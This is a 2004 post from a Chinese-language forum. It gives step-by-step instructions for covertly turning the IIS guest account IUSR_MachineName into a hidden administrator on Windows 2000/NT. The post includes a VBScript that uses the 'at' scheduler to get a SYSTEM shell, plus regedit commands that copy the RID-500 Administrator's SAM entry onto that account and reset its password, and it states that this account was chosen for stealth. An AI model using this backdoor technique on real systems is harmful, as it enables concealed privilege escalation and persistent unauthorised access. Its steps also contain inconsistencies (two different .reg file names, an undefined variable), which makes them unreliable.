|
|
|||||||
| 論壇說明 |
|
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
|
主題工具 | 顯示模式 |
2004-09-18, 02:47 AM
|
#8 (permalink) |
|
長老會員
 
|
Administrator 帳號
首先要知道的概念是在Windows 2000和Windows NT,預設管理員帳號的SID
是固定的500(0x1f4),那麼我們可以用機器裡已經存在的一個帳號將SID為 500的帳號進行複製,在這裡我選擇的帳號是IUSR_MachineName(當然,為了 加強隱蔽性,我們選擇了這個帳號,所有帳號都可以用以下的方法,只不過這 個帳號較常見罷了),測試環境為Windows 2000 Server。 執行一個System的CMD Shell '================================================================ On Error Resume Next Set objNet = WScript.CreateObject( "WScript.Network" ) Set ServiceObj = GetObject("WinNT://" & objNet.ComputerName & "/schedule") if ServiceObj.Status=1 then ServiceObj.start end if aHour = hour(now) aMinute = minute(now)+"1" set wshshell = createobject ("wscript.shell") wshshell.run ("at " & aHour & ":" & aMinute & ":" & aSecond & " " & "/interactive cmd.exe") Wscript.echo "Waiting for the cmd window for NT AUTHORITY\SYSTEM at " & aHour & ":" & aMinute & "..." '================================================================ 或使用 psu.exe,然後在該CMD Shell裡面執行 regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 這樣我們將SID 為500的管理員帳號的相關資料匯出,然後編輯adam.reg檔案, 將adam.reg檔案的第三行..... [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最後的"1F4"修改為 IUSR_MachineName的SID(大部分的機器該帳號的SID都為0x3E9,如果機器在最初安裝的時候沒有安裝IIS,而自己建了帳號後再安裝IIS就有可能不是這個值),將Root.reg檔案中的"1F4"修改為"3E9"後執行 regedit /s adam.reg 匯入該Reg檔案 然後執行 net user IUSR_MachineName Sphone 修改IUSR_MachineName的密碼......完成 |
|
__________________ 給自己看也給所有需要這些話鼓勵的人看! 認真不一定會得到美好的結果,但是不認真就一定沒有 想要有什麼結果,就秉持你的雙手 放手去做 總比什麼都沒付出最後失敗了才嘆氣來的好吧 沒努力的人.沒有資格說放棄 努力過的人.更要有勇氣繼續努力下去
|
|
|
送花文章: 1,
|
樹形模式